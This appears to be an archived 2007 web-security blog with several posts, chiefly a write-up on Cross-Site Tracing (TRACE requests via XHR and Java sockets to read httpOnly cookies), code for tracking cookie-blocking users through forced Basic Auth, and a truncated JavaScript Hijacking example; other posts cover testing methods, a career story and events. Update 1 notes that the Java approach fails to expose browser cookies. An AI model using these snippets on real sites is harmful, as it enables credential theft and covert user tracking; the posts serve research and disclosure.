Monday, April 30, 2007

XST sorta Lives! (Bypassing httpOnly)

Update 2: Amit Klein wrote in to remind me that you technically still can issue TRACE requests using XHR in IE6 SP2. By prepending some whitespace to the method name, the restriction can be bypassed (see below). I had forgotten about this little gem and would have thought MS would have fixed it long ago. Guess not, or maybe they have; either way I couldn't find any mention of a fix. I also haven't done a lot of testing with IE7's XHR implementation (native, right?); perhaps the same or other quirks can be found in there as well that could prove useful.

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.open("\r\nTRACE","/",false);
x.setRequestHeader("Max-Forwards","0");
x.send();
alert(x.responseText);

Update 1: Jordan and Wladimir Palant noticed it right away! (Wladimir) "Wait, last time I checked Java wasn’t making HTTP requests through the browser. That means that neither cookies nor HTTP basic authorization will be visible in the response - only what you put in there yourself. Did that change?"

Apparently I made a very large oversight in my research. Wladimir and Jordan are absolutely right! Java handles the entire HTTP connection outside of the browser and hence does not send the cookies, headers, or anything else. So that data doesn't come back to be captured. Big mistake on my part. Can't believe I missed that! Very sorry. But I have another thought that I have to double check on....


Back in late 2002 Microsoft implemented the httpOnly cookie flag in Internet Explorer as a way to prevent XSS cookie theft by denying JavaScript access to document.cookie. A couple of months later I authored a paper describing an attack I called Cross-Site Tracing (XST), or XSS++ if you prefer, as a way to bypass httpOnly (plus added some other good stuff). XST works by taking control of a victim's web browser and forcing it to send an HTTP TRACE (method) request to the target web server, typically via XMLHttpRequest (XHR). Web servers supporting TRACE respond by placing all the data received in the HTTP request (request line, headers, post data) into the response body. Here’s an example of a simple TRACE request exchange:

> telnet foo.bar 80
Trying 127.0.0.1...
Connected to foo.bar.
Escape character is '^]'.
TRACE / HTTP/1.1
Host: foo.bar
X-Header: test
Cookie: param=1

HTTP/1.1 200 OK
Server: Apache
Content-Type: message/http

TRACE / HTTP/1.1
Host: foo.bar
X-Header: test
Cookie: param=1

Because the cookie is echoed back in the response body, rather than only being available through document.cookie, JavaScript can read it despite the httpOnly flag. As an additional benefit of XST, attackers can gain access to Basic, Digest, and NTLM Auth credentials located in HTTP request headers that are typically out of reach of JavaScript.
Simple. In response, all major web browsers updated XHR to block the use of TRACE. Flash did the same. In the years since, I figured XST was dead on anything but an older browser, that is, until late last week.

I was experimenting with some JavaScript calling Java APIs to perform socket calls and then it hit me. If JavaScript and Flash can’t issue TRACE requests, maybe Java could. Turns out I was right: JavaScript can direct Java to issue TRACE requests out of the browser, but my PoC implementation was slow. With help from our friendly neighborhood Java guru, Anurag Agarwal, we got some nice bookmarklet PoCs up and running. I’ll let Anurag take you through the code.

Please be mindful that the code is unstable and your results may vary due to browser support.

Approach 1 (Traditional approach using earlier versions of the JDK)

//Get the url on the browser’s address bar
var l = document.location;

//Get the host name.
var host = l.host.toString();

//Set the port to 80. We can also determine the port from the location bar
var port = 80;

//Resolve the host name to an address
var addr = java.net.InetAddress.getByName(host);

//Create a client socket to the server on the specified hostname and port
var socket = new java.net.Socket(addr,port);

//Open an output stream to send the request data to the server.
var wr = new java.io.BufferedWriter(new java.io.OutputStreamWriter(socket.getOutputStream(),"UTF8"));

//Open an input stream to read the response data from the server.
var rd = new java.io.BufferedReader(new java.io.InputStreamReader(socket.getInputStream()));

//Send a TRACE request to the server (HTTP lines are terminated with CRLF).
wr.write("TRACE / HTTP/1.1\r\n");
wr.write("Host: " + host + "\r\n");
wr.write("\r\n");

//Flush the output stream so that there is no data left in the buffer.
wr.flush();

//Read the response from the server until the readLine returns null which means the response is completed.
var lines = "";
var str;
while ((str = rd.readLine()) != null)
{ lines += str + "\n"; }
alert(lines);

//Close the input and output stream
wr.close();
rd.close();

//Close the socket
socket.close();
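
Once the echoed request comes back, pulling the cookie out of the response body is trivial. Here's a hypothetical follow-on to the snippet above (the regular expression and variable name are mine, purely for illustration; lines holds the TRACE response read above):

//Extract the echoed Cookie header from the TRACE response body
var cookieMatch = lines.match(/^Cookie:\s*(.*)$/m);
if (cookieMatch) { alert("Recovered cookie (httpOnly or not): " + cookieMatch[1]); }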

In the traditional approach (like the one above), you ask the socket for its input and/or output streams. The newer approach uses Channels, available in JDK 1.4 or newer. With a channel you read and write directly against the channel itself, and rather than byte arrays you read and write ByteBuffer objects. By default a read returns at least one byte, or -1 to indicate the end of the data, exactly as an InputStream does, and it will often read more bytes if more are available.

Approach 2

var l = document.location;
var host = l.host.toString();
var port = 80;
var addr = java.net.InetAddress.getByName(host);

//Create a SocketChannel
var client = java.nio.channels.SocketChannel.open(new java.net.InetSocketAddress(host, port));

//Create a java string object so that it can be converted to byte array.
var line = "TRACE / HTTP/1.1\r\nHost: " + host + "\r\n\r\n";
var s1 = new java.lang.String(line);

//Send the data to the server.
client.write(java.nio.ByteBuffer.wrap(s1.getBytes()));

//Allocate a buffer to read the data from the server.
var buffer = java.nio.ByteBuffer.allocate(8000);

//Read the data from the server. If the response is larger than the allocated buffer then this probably is not the best way; use a different approach.
client.read(buffer);

alert(new java.lang.String(buffer.array()));
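
Anurag's actual bookmarklet code isn't reproduced here, but to give an idea of the packaging, either approach can be condensed into a javascript: URL. A rough sketch based on Approach 2 (my own condensation, collapsed onto one line when installed as a bookmark; results will vary by browser and Java plugin):

javascript:(function(){
var host = document.location.host.toString();
var client = java.nio.channels.SocketChannel.open(new java.net.InetSocketAddress(host, 80));
client.write(java.nio.ByteBuffer.wrap(new java.lang.String("TRACE / HTTP/1.1\r\nHost: " + host + "\r\n\r\n").getBytes()));
var buffer = java.nio.ByteBuffer.allocate(8000);
client.read(buffer);
alert(new java.lang.String(buffer.array()));
})();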

Wednesday, April 25, 2007

Battle of the Colored Boxes (part 1 of 2)

Black, White, and Gray Box software testing methodologies, everyone has a preference. People frequently claim one method is best because another is “limited”. For me that’s like saying a fork is better than a spoon (at what exactly?). The fact is if a perfect methodology for software testing existed, we’d have bug-free code, but of course we don’t. Each has its strengths, which are often the weaknesses of the others. This means the various methodologies are often complementary to each other, not substitutes. The best thing to do is understand what each is good and not so good at, then select the one most appropriate for the task.

Let’s look at Black, White, and Gray Box software testing from a high level as it relates to website security and highlight their strong points. I realize that not everyone will agree with my conclusions. So as always, feel free to comment and let me know if anything has been overlooked and should be considered. Also, for perspective, I’m of the opinion that all three methodologies require tools (scanners) and experienced personnel as part of the process. No exceptions.

Black Box (Dynamic Analysis)
Wikipedia: “Dynamic code analysis is the analysis of computer software that is performed with executing programs built from that software on a real or virtual processor”.

The attacker starts off with zero knowledge of the application source code, system access, documentation, or anything else a typical user wouldn't have access to. This is normally an attacker armed with a web browser, a proxy, and perhaps some fault injection tools.

Black Box’ing:
  1. Measures the amount of effort required for an attacker to compromise the data on a website. This measurement takes into consideration additional layers of defense (web servers, WAFs, permissions, configs, proxies, etc.). This enables website owners to focus on areas that directly improve security.
  2. Allows faster business logic testing by leveraging actual operational context. Testers are able to uncover flaws (Information Leakage, Insufficient Authorization, Insufficient Authentication, etc.) that may otherwise not be visible (or significantly harder to find) by analyzing vast amounts of source code.
  3. Is generally considered to be faster, more repeatable, and less expensive than White Box’ing. This is helpful to development environments where websites are updated more than a few times per year and as a result require constant security (re)-assurance.
  4. Provides coverage for common vulnerabilities that are not present in the code, such as Predictable Resource Location and Information Leakage. Files containing sensitive information (payment logs, backups, debug messages, source code, etc.) routinely become unlinked, orphaned, and forgotten.

White Box (Static Analysis)
Wikipedia: “Static code analysis is the analysis of computer software that is performed without actually executing programs built from that software. In most cases the analysis is performed on some version of the source code and in the other cases some form of the object code.”

An attacker with access to design documents, source code, and other internal system information.

White Box’ing:
  1. Generally considered to be a deeper method of software testing as it can touch more of the code, including areas that may be very difficult or impossible to reach from the outside. Vulnerabilities such as SQL Injection, backdoors, buffer overflows, and privacy violations become easier to identify, and it becomes easier to determine whether an exploit will work.
  2. Can be employed much earlier in the software development lifecycle (SDLC) because Black Box’ing requires that websites and applications are at least somewhat operational. Libraries and APIs can be tested early and independently of the rest of the system.
  3. Is capable of recommending secure coding best-practices and pinpointing the exact file or line number of vulnerabilities. While a website might be “vulnerability free” from an external perspective, bad design decisions may cause a precarious security posture. Weak use of encryption, insufficient logging, and insecure data storage are examples of issues that often prove problematic.
  4. Has an easier time determining whether identified vulnerabilities are one-off developer mistakes or architectural problems across the entire application infrastructure. This insight is useful when making strategic security decisions such as training, standardizing on software frameworks and APIs, or both.

Gray Box or Glass Box
The combination of both Black and White Box methodologies. The spork of software testing if you will. This approach takes all the capabilities of both and reduces their respective drawbacks. The goal is to make the whole (process) worth more than the sum of its parts. In many ways Gray Box’ing achieves this so no need to go back over the above material. The largest negative issue is the increased cost in time, skill, repeatability, and overall expense of the process. Qualified people proficient in either Black or White Box’ing are hard to find and retain. Locating someone who is solid at both is extremely rare and as a result they can demand high bill rates. And of course they need double the tools so double the cost.

Top 10 Most Famous Hackers of All Time

ITSecurity has a thing for linkbait "top-lists". Normally I try to remain immune, but hey, who can blame them for trying right? This time I figured I'd help them out since I've actually had the opportunity to meet a few of the "Top 10 Most Famous Hackers of All Time". Interesting individuals, and they're always much different in person than the mental image of their persona I had created in my mind. Often these guys show up at Defcon or BlackHat and are usually willing to exchange a story for a beer. Good times.

Monday, April 23, 2007

XSS Attacks book

"XSS is the New Buffer Overflow, JavaScript Malware is the New Shell Code"

At long last, we put the finishing touches on our new book (XSS Attacks), the cover art, and sample chapter (including ToC). It’ll be sent to the printers May 5 and shipped a few days after. Woohoo!

I’ve written two book forewords in the past, but this is my first experience as an author so I’m really excited about the release. Only a couple years ago the idea of an entire book dedicated to XSS would have been crazy. Today the general feeling is that there’s FINALLY going to be one available. Especially for me, since I have to explain the finer points daily.

In writing this book, the shock to me was how much there is about XSS to cover. In fact there was so much data we had to cut back a significant amount, otherwise we’d have to write two books. What this also means is that the content found within the pages is high quality and densely packed. Great for people just getting up to speed on XSS and a solid reference for those who desire a deeper understanding of the attack technique specifics currently scattered all over.

I also wanted to give major kudos to the other authors who made this possible RSnake, Anton Rager, and especially Seth Fogie and pdp (architect), who really went above and beyond. You guys rocked. And thank you to Andrew Williams (Managing Editor, Syngress Publishing), a publisher I’d highly recommend to anyone and hope to work with again in the future. Writing a technical book is hard, really hard, and there is no substitute for a good team.

Friday, April 20, 2007

Tracking users with Basic Auth

Update: Amit Klein, being the very thorough expert that he is, pointed out that method #2 below has previously been used in the wild, and that #3 might not actually work in IE; RSnake was experiencing some strange caching issue that he and Amit are working out the details on.

Thanks to RSnake for helping me test this one. Some users configure their web browsers to block cookies entirely, or at least for certain websites (like banner providers). They’re attempting to protect their privacy, imagine that. Anyway, there seems to be a way to track users with Basic Auth instead of cookies. Here’s a walk-through of the concept:

1) User visits a websiteA where they are blocking its cookies.

2) websiteA delivers a web page with some JavaScript code that silently forces the browser to Basic Auth to the web server with a specific username and password. Think of the u/p as nothing more than a session ID as the web server will authenticate anything sent.

Depending on the browser, either of these methods below could work and will cache the u/p.

Firefox Only
<img src="http://session:ID@website/">

or

Firefox or Internet Explorer

function forceBasicAuthentication() {
var req = null;
if (window.XMLHttpRequest) { req = new XMLHttpRequest(); }
if (!req) { req = new ActiveXObject("Msxml2.XMLHTTP"); }
if (!req) { req = new ActiveXObject("Microsoft.XMLHTTP"); }
req.open('GET', 'http://website/', false, 'Session', 'ID');
req.send(null);
}

Internet Explorer Only

function forceBasicAuthentication() {
var req = null;
if (window.XMLHttpRequest) { req = new XMLHttpRequest(); }
if (!req) { req = new ActiveXObject("Msxml2.XMLHTTP"); }
if (!req) { req = new ActiveXObject("Microsoft.XMLHTTP"); }
req.open('GET', 'http://website/', false);
req.setRequestHeader("Authorization", "Basic nQzw==");
req.send(null);
}

3) Once the browser has authenticated (after receiving a 401), it will cache the u/p and send it with each subsequent HTTP request. The benefit of this method is that there is no way to block Basic Auth forced in this way, and the user never sees the standard Basic Auth pop-up.
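
The server side isn't shown above, but the "authenticate anything" piece is simple. Here's a rough sketch of what it might look like (written against Node.js purely for illustration; the realm name, port, and variable names are mine, and any web server or CGI that answers with a 401 and then accepts whatever comes back would do the same job):

//Hypothetical tracking endpoint: accept ANY credentials, use them as the ID.
var http = require('http');

http.createServer(function (req, res) {
  var auth = req.headers['authorization'];
  if (!auth) {
    //First visit: answer with a 401 so the browser caches whatever u/p
    //the JavaScript (or img tag) supplies.
    res.writeHead(401, { 'WWW-Authenticate': 'Basic realm="tracker"' });
    res.end();
    return;
  }
  //Every subsequent request carries the "session ID" in the Authorization header.
  var id = Buffer.from(auth.split(' ')[1], 'base64').toString();  //e.g. "Session:ID"
  res.writeHead(200, { 'Content-Type': 'text/plain' });
  res.end('Tracked as: ' + id);
}).listen(8080);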

Thursday, April 19, 2007

Here come the statistics!

Finally, hard data is being made available so we don’t have to speak in purely theoretical terms anymore about the importance of our work. We’ve been waiting to get to this point in the industry for years. I’ve been talking about the need for statistics on “how websites can be broken into” and also “how they are attacked or compromised”. This is important stuff to have at the ready. So today I was very happy to have the opportunity to host a popular webinar (slides) and release our in-depth Web Application Security Risk Report (reg req.). Mind the marketing-fu:

“Through our flagship service, WhiteHat Sentinel, we perform rigorous and ongoing vulnerability assessments on hundreds of (public-facing) production and development websites each month. Our work gives us a one-of-a-kind perspective into website vulnerability trends across financial, e-commerce, healthcare and high-tech industries. WhiteHat Security can accurately identify which issues are currently the most prevalent and severe. As the only company with access to this depth of cumulative data, we are sharing our findings to provide enterprises with a clearer picture of the vulnerability management issues affecting their websites. This quarter’s report represents a more than three-fold sample increase over the last, and is based on data obtained between January 1, 2006 and March 31, 2007. “

Then just last week the Web Application Security Statistics Project, to which we contributed along with three other companies, released a combined set of data. Sure, there were a few gripes about the value of the data, but this is just a starting point for progress and people recognize that. Over time, the data will become larger and more representative. Good stuff for the community at large. Get involved if you can.

“This initial round of statistics was compiled from data provided by four vendors - Whitehat Security, SPI Dynamics, Positive Technologies and Cenzic. We would like to thank all of the initial contributors for their participation. Our goal is to have the project grow over time with data from an increasing number of sources as this will improve the overall quality of the data. Statistical biases will be lessened as more entities contribute to the initiative so we would encourage those vendors engaged in web application scanning work to contact us if they are interested in participating in the project.“

And also, The Web Hacking Incidents Database has been updated at long last, which is an excellent resource to research news stories relevant to web application security.

“The web hacking incident database (WHID) is a Web Application Security Consortium project dedicated to maintaining a list of web applications related security incidents. The database is unique in tracking only media reported security incidents that can be associated with a web application security vulnerability. We also try to limit the database to targeted attacks only.”

Out of our hands

Everyone is figuring out that Web-based applications are the future of software, with Software as a Service (SaaS) as the delivery model of choice. Businesses are migrating to Salesforce.com. Google Apps launched in full force to disrupt Microsoft Office dominance. And who knows how many businesses have been made possible by eBay’s marketplace. The advantages and cost savings of Web-based applications and SaaS are just too good to ignore despite how much sensitive data is being uploaded.

Even we everyday users are taking advantage of easy-to-use Web applications. Online banking: when is the last time you went to your local branch? Heck, even they host their web apps. Taxes: tens of millions filed online this year. They host too. Hundreds of millions use Web mail, instead of or in combination with desktop email applications. When it comes down to it, it’s hard to know who really has your data anyway, maybe a dozen or more companies. What this also means for security practitioners is that the rules and business requirements have changed dramatically yet again.

Lack of Control
Any information users upload or create (email, documents, spreadsheets, marketing information, etc.) now resides on someone else's web servers (Google Calendar), publicly reachable 24/7/365, not on your private local network, and its security is beyond your immediate control. How much do you trust or understand the security practices of the hosting company? You can’t make your data secure even if you want to.

Escalating Risk
While various web-based systems start off small in terms of users (as Salesforce.com once did), they are relatively unattractive targets for the bad guys. However, as they increase in popularity to millions of user registrations, more bad guys will target them for the potential payoff. MySpace is a good example of this, and the data it stores is nothing anyone would really consider sensitive. Think of other financial or information-oriented systems with millions of users; those are the REALLY attractive targets.

Incident Response
Should a breach occur, how would you know? Would the company be legally obligated to tell you? Under what circumstances? (Turbo Tax) What is their backup and disaster recovery policy? Are you out of business during that time? These are serious business security and continuity issues should organizations rely upon these services for day-to-day operations. Downtime costs could be huge.


Anyway, I wish I had more in the way of immediate solutions beyond testing the security yourself. But that is probably not legal, and they are unlikely to hand over written consent. As more breaches occur, we’ll figure out the answers.

Sunday, April 15, 2007

How I got my start

I’ve told this story from time to time when asked, but never written about it. The inspiration to do so came from posts by Security Catalyst and Andrew Hay. Computers have been a part of my life for nearly 20 years, starting with a Commodore 64 when I was ~10, a few x286s and x386s, then a Power Macintosh 6100 my mother bought for me when I was 16. Coded a lot in between, but that’s ancient history and a story you’ve probably heard a hundred times. So let’s skip to where it gets interesting. And to borrow a line from Great Expectations: “I'm not going to tell the story the way it happened. I'm going to tell it the way I remember it.”

As a late teenager I left Maui for California to attend college, find a decent job, and seek out greater opportunity. I enrolled in a trade school for electronics engineering. At the same time my couple years of web development and Unix experience were enough to land me a job as an entry-level Unix Administrator for Amgen (a large bio-tech company). I got to work on mega-big Sun (Solaris) servers as part of a team responsible for backups, disaster recovery, and web-enabling day-to-day operations. Amgen was very wealthy, treated their employees exceedingly well, and threw lots of posh parties. Most of which I couldn’t attend because they served beer & wine and I wasn’t yet of age. Funny, eh. Being only 19 or 20, this was a kickass job, I learned a lot, and I loved it.

Then in the autumn of ’99 something strange happened. A slew of well-publicized articles hit the Web saying someone had found vulnerabilities in many of the major websites like Yahoo!, Amazon, and eBay. As a result they were “insecure”. I knew making a secure website was exceedingly hard, and as far as I was concerned, impossible. So being a naive youngster, I couldn’t figure out why this was newsworthy and thought everyone already knew! What happened next was even more interesting. Weeks later the same companies issued statements that they had fixed the issues and were now completely “secure”. Amazing, naïveté kicking in, how did they do this!?!? I had to know!

After work I registered a few shiny new Yahoo! Mail accounts, and thought to myself – “how hard could this possibly be (to break into my own accounts)?” I don’t remember the actual vulnerability, but it took only a few minutes to find. Probably had something to do with an XSS / JavaScript filter-evasion or meta-character injection. Wrote up a simple minded advisory and sent it anonymously to the only internal Yahoo! corp email address I could find (specific address withheld). The message explained what the issue was, said I didn’t want any credit or press, and to let me know if they had any questions. Had my fun for the evening figuring that was the end of that.

The next morning I checked the account and lo’ and behold someone responded! Wow, Yahoo! is talking to ME! During those days there was no company bigger or more exciting than Internet darling Yahoo! The email read thank you for letting us know about the issue, we have a couple of questions, appreciate you wanting to remain anonymous, but we’d like to send you a t-shirt. WHOA HO! Not only was I able to find a vulnerability in Yahoo!, but it was important enough that they’re asking about it and want to supply me with clothing. Cool. They also said to let them know if you find anything else. Sweet, an open invitation.

Over the next week or two I’m finding bugs, reporting them, and having a casual dialog with somebody at Yahoo!. I mentioned to a co-worker what was going on and they were excited about it as well. They asked whom I was communicating with, but I hadn’t thought to check. I forwarded one of the emails so they could see. They facetiously told me to have a look for myself. I took the name from the email address (withheld), and I kid you not, it was from David Filo, one of the two Yahoo! founders and so-called Chief Yahoo!. OMG! Here I am, some dumb kid with a few web app vulns, and I’m having an informal, nonchalant conversation with a billionaire. BTW, Filo is a very cool guy and if you ever meet him, he’s an amazingly smart engineer without an ounce of the arrogance or superiority complex that one might expect.

A few days later a Yahoo recruiter emailed and asked if I’d like to fly up to Silicon Valley for an interview. Stunned is the word that best describes my reaction. I made sure they knew that I had no formal education or security experience to speak of. It didn’t bother them, so it didn’t bother me. At their purple and yellow laced offices, they grilled me on all sorts of technology questions for 6 hours, most of which I didn’t know. C’mon, this was Yahoo, how could I? Figuring I had no shot at all I promptly flew home. I heard back a couple days later via FedEx. YES! An offer letter from Yahoo! OMG, look at the salary! COOL, job description was nothing but security! NO WAY, stock options! YES! Wait, what the heck are those?

I took the prized yellow piece of paper to my school counselor and asked her a very simple question: “What does the top student out of here expect to make at their next job?” Begrudgingly she told me, and it was nowhere near what my offer letter said. Then I asked if she had any GOOD reason why I should stay. The only answer I recall was that you’ll never go back and finish your degree (she was right of course). And just like that I was gone and on my way. Took a month off back on Maui, hiding out from Y2K, then started my new life in January of 2000.

I became part of Yahoo! Engineering and felt completely out of my league around the real super brains of Web technology. My job was simple. Identify as many security vulnerabilities as possible, formulate solutions, and chase down developers to resolve them. Talk about awesome, with my new "hacker yahoo" job title. It took about 6 months to get my arms around web application security and how big and important this job actually was. The scope was roughly 180 million users and 17,000 publicly facing web servers. 12+ hour days were the norm. On a system that massive, IDSs tell you only one thing that matters: everyone is attacking you with everything they’ve got, all the time. Unscientifically we figured about 1% of our user-base was malicious, a similar number to what we heard from our industry peers. Yes, 1.8 million bad guys.

I performed what seemed like a never-ending supply of web application security assessments. It was rare for a website to be completely free of security issues. To streamline the workload I developed an assessment methodology consisting of a few thousand security tests averaging 40 hours to complete per website. The domain was 600+ websites, enterprise-wide, in a dozen or so languages from English to French to Korean. The way the math worked out, assessing the security of every website would have taken over 11 years (24,000 total hours / 2,080 working hours per year) to complete if nothing ever changed. Yah, right.

Obviously we needed to reduce workload because few experts existed and we certainly weren’t going to hire a dedicated team of 10. Seeking help I talked to every expert I could find and experimented with early commercial scanners and web application firewall solutions. None of what I saw was going to solve our problem. Almost two years in what I did see was opportunity. Yahoo! was certainly not the only one in the e-commerce business or grappling with too much work, too few experts, and a lack of decent tools. I felt I could do better, which ultimately led to my founding of WhiteHat Security.

Well, that’s how I got my start. And the last 6 years have only gotten more interesting.

Friday, April 13, 2007

mainstream media is figuring out the industry's new disclosure dilemma

Bug hunters face online apps dilemma (via Joris Evers from CNET)
"Security holes in online applications may go unfixed because well-intended hackers are afraid to report bugs. Web applications pose a dilemma for bug hunters: how to test the security without going to jail? If hackers probe traditional software such as Windows or Word, they can do so on their own PCs. That isn't true for Web applications, which run on servers operated by others. Testing the security there is likely illegal and could lead to prosecution."

We've all debated the legal and ethical issues, but it doesn't change the fact that we're going to lose the canary-in-the-coal-mine aspect of information security. Does that mean we're going to have to rely on compliance rather than community peer review? Eeesh!

I also just caught Alan Shimel's follow-up on the article, he comments on one of my quotes:

"Jeremiah Grossman of White Hat Security (and a past guest on our podcast) is quoted as saying that: "We're losing the Good Samaritan aspect of security". He uses the gun law analogy that if we make it illegal to find vulnerabilities in web sites, only bad guys will find them. Sort of like if it is illegal to own guns, than only bad guys will own guns. I disagree with the gun analogy and I disagree with Jeremiah on this one. I just think there is too much room for abuse to allow condone people hacking into web sites. Who really knows what their motives are."

Let me clarify because I still stand by the statement as what will inevitably happen should Good Samaritans be routinely prosecuted. But, I don't think Alan and I fundamentally disagree on the next step of the legal matters. Pen-testing websites without consent is and should be illegal (we can debate proper penalties later). There is just too much risk otherwise. What we do have is a catch-22 situation.


Tuesday, April 10, 2007

WASC Meet-Up (Sunnyvale, Ca.) April 18, 2007 @ 6pm

Normally we hold WASC Meet-Ups during large conferences (RSA 2007/BlackHat) where a lot of web application security people are at the same place at the same time. Around the S.F. Bay Area there's enough webappsec people that we no longer need that excuse. So we're planning a WASC Meet-Up inviting those in the local community to drop by. It'll be an informal event, maybe 15-30 people, no presentations or sponsors. Just like-minded people sharing food, drinks, and interesting conversation. Simply an opportunity to see people that we only otherwise communicate with virtually. Everyone is welcome and please drop me a note if you plan on coming.

Oh, one last thing: Everyone is encouraged to buy a beer for someone they didn't previously know.

Time: Wed, April. 18 @ 6:00pm

Place:
The Faultline (Sunnyvale)
http://www.faultlinebrewing.com/

1235 Oakmead Parkway
Sunnyvale, California, 94086
Tel:408/736-2739

See you all there!

Jeremiah Grossman
contact@webappsec.org

Friday, April 06, 2007

Vulnerability Assessment, When do we stop looking?

This is a fair and increasingly common question in web application security. Especially considering that we never know how many bugs (or vulnerabilities) actually exist in a piece of code. This is also why I tend to approach security as an attempt to make a system as hard as possible (not impossible, because that’s impossible) for the “bad guys” to break into. Finding and fixing vulnerabilities, whether pre-deployment or post-production, makes the next vulnerability harder to identify. The idea is to require the bad guys to expend more resources (time, money, etc.) than it’ll be worth should they succeed. Realistically though, given a long enough timeline, everyone gets hacked, if they haven’t been already. Which raises the question, when do we stop looking for vulnerabilities?

The answer varies depending on the importance of each website and the security needs of the organization. Beyond the everyday network noise, in my experience the average attacker targeting custom web applications uses a web browser, an HTTP proxy, Google, and perhaps some specially crafted scripts. I think at this layer the odds are the attackers aren’t using vulnerability scanners of either the open source (because no decent ones exist) or commercial variety (it’s faster for them to find the vulnerability or two they need by hand). The main variable in a bad guy’s success is their level of persistence and cognitive skill rather than the capability of the tools. This is an important benchmark to understand.

The way the logic works is that the more thorough and frequent the VA process, the fewer attackers there are in the world possessing the time/ability to penetrate the system. Depth of testing needs to outpace what is perceived to be the skill of the vast majority of bad guys. Otherwise what’s the point? There are the casual researcher types who just want to see if they can find an XSS issue on domain X. Then, a level above, there are the more dedicated and skilled attackers willing to invest several weeks or months to defraud a system. Frequency of VA should also match the change rate of the application. For example, a web application that changes every week doesn’t match up well with an annual two-week engagement.

At some point VA reaches a level of diminishing returns, and after thousands of assessments we have a good idea of best practices and what due diligence represents. We understand security can never be 100% and at some point mistakes will be made, bad guys get lucky, or they’re talented and VERY persistent. I created the following diagrams to illustrate these concepts. The diagrams are not meant to be literal measures but to visually describe the fundamental concepts.

Time/Difficulty vs. Total Vulnerability (%)
Now we overlay the estimated effectiveness of certain solutions onto the same vulnerability coverage zones of certain adversaries.

Effectiveness/Skill vs. Persistence
When do we stop looking?

As a biased VA vendor it’ll sound self-serving (but so be it): on websites where the code changes more than a few times per year and which require at least a modest degree of security, you never stop looking, because the bad guys certainly won’t. Applications are changing, and attack techniques are improving even when the applications aren’t. You want to enlist those who are AT LEAST as skilled as the pool of attackers, have a thorough methodology, and a consistent process. To borrow a quote from Bruce:

“Security is a process, not a product.”

False-negatives, oh how I hate thee

At WhiteHat we launch thousands (sometimes millions and everything in between) of customized attacks on our customers’ websites in an effort to find any, and hopefully all, vulnerabilities before the bad guys exploit them. After performing vulnerability assessments (VA) on hundreds of websites each week, your team becomes extremely experienced and proficient at the process while uncovering bucketloads of issues. Experience, consistency, and efficiency are key in webappsec VA. The one thing that’s always on my mind, though, is the ever-present risk of missed vulnerabilities. So-called false-negatives. What does anyone (enterprise or vendor) do about those?

Just like developers and bugs, assessors are humans who make mistakes, and inevitably business logic flaws will get missed. Scanning technology is imperfect and will fail to find technical vulnerabilities (XSS, SQL Injection, etc.). Or even certain links for that matter. This is an issue but not the core problem. The real issue is there’s no way to know for sure how many vulnerabilities actually exist in a real-live production website. Meaning, there’s no real way for any vulnerability assessment solution to measure itself proactively against the true vulnerability total, because that total is unknown. (Please don’t tell me canned web applications, because that’s not the same thing.) We can only measure against the next best solution (bake-off) or the next best bad guy (incident). The results generated are simply not the same as, or as good as, measuring against the true vulnerability total, which would be ideal.

Tuesday, April 03, 2007

odd pictures from my travels

These guys take security seriously. First, "I think" the word "woman" should be "women", and why exactly would pregnant women have to worry about being run through this thing? Not to mention the person with a pacemaker.


Why an xmas tree made of small red teddy bears of course.

The other thing I learned working at Yahoo!

Seemed strange to run into the bathroom and hangout with a bunch of other guys during a tornado.

Destroyer of hard drives

Entrance to the NYSE. Nothing really strange here, move along.

Video Interview with Help Net Security

During RSA 2006, Mirko Zorz and Berislav Kucan (the guys behind Help Net Security and my personal favorite infosec magazine (IN)SECURE) invited me to record a video. "Web Application Security with Jeremiah Grossman", what else would I be talking about? :)

Description: "Jeremiah Grossman is the CTO of WhiteHat Security. In this video he talks about the differences between web application security and network security, the assessment process in general, logical vulnerabilities as well as Web 2.0 security developments. He also provides us with insight on his work as a security officer at Yahoo! and the reason why he started WhiteHat Security."

This was a lot of fun and a great use of the medium. I've only done a couple of these video interviews in the past and *whew*, they do make ya a little nervous. This should be done a lot more often at conferences in my opinion. Help Net, going to Black Hat USA?

I also noticed Help Net posted several other interesting looking infosec videos to YouTube as well. Good stuff!

Monday, April 02, 2007

Digg buttons with smarts!

Andrew "Drew" Hintz put the CSS History Hack to good use. He made a JavaScript include that only shows the "Digg" button to users who have actually been to Digg.com. No need to show it to other users who aren't familiar with the website. I tried it out and works perfect and it even has configuration options. Way cool. Nice work Drew!

OWASP, San Jose, and PCI (April 12)

I regularly attend the local OWASP Chapter meetings here in San Jose. It's always good to mingle with the webappsec crowd and share some high-end conversation. There are some amazingly smart people around with solid insights. Also a big plus if you learn something from the presenters of course. :)

In this particular case, I'm really interested in hearing what Bernie Weidel, the PCI guy from Qualys, has to say. He's going to cover the real deal as it relates to webappsec and the standard. I got to talking with Bernie last week and I learned a great deal from him that I hadn't heard anywhere else. There are a lot of blind spots in there and he's in a position to know the guts of what's going on. If you're in the area, stop by and say HI!

Thursday, April 12, 2007
Ariba
807 11th Avenue
Sunnyvale, Ca 94089

Agenda and Presentations:
6:00pm - 6:30pm ... Check-in and reception (food & bev)
6:30pm - 7:30pm ... Past, Present and Future of Web Application Security in PCI - Bernie Weidel
7:30pm - 8:30pm ... Top Web Application Vulnerabilities, Exploits and Countermeasures - Josh Daymont

JavaScript Hijacking

Update: Robert Lemos (SecurityFocus) followed up as well, "Developers warned to secure AJAX design"

Update: Joris Evers from C-Net blogged the story.

Brian Chess (Chief Scientist) from Fortify recently invited me to peer review an interesting new white paper entitled “JavaScript Hijacking” prior to its release. Private peer review is something I do with some regularity to help people out, and in return I get to see what others are working on ahead of time. It's a cool exchange! Plus, this work extends some of my earlier research into JavaScript object overwriting (Gmail example), so I have the background for it. Specifically, when an AJAX-enabled website returns sensitive data as a JavaScript object, that response can be susceptible to CSRF-style attacks.

The paper digs into the various AJAX development frameworks, how they defend against CSRF attacks, or don’t, possible solutions, risks, advice, etc. Brian Chess, Yekaterina Tsipenyuk O'Neil, and Jacob West did a good job researching this, consulted with the experts, and presented the technical bits in an easy to understand fashion. For those already up to speed on bleeding-edge web attacks, you’re not going to find anything “new”. This is more for developers and organizations that want something simple that explains what’s going on and what they can do about it. Good stuff.
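
For readers who haven't run into the attack class before, here's a bare-bones sketch of the simplest variant (all names and URLs below are hypothetical; the paper also covers bare JSON arrays being captured through tricks like overriding the Array constructor). The attacker's page includes the sensitive, cookie-authenticated endpoint with a script tag and supplies the callback itself:

<!-- Hosted on the attacker's site; the victim only needs to be logged in elsewhere -->
<script>
//The attacker defines the callback the JSON response will invoke
function showContacts(data) {
  var stolen = "";
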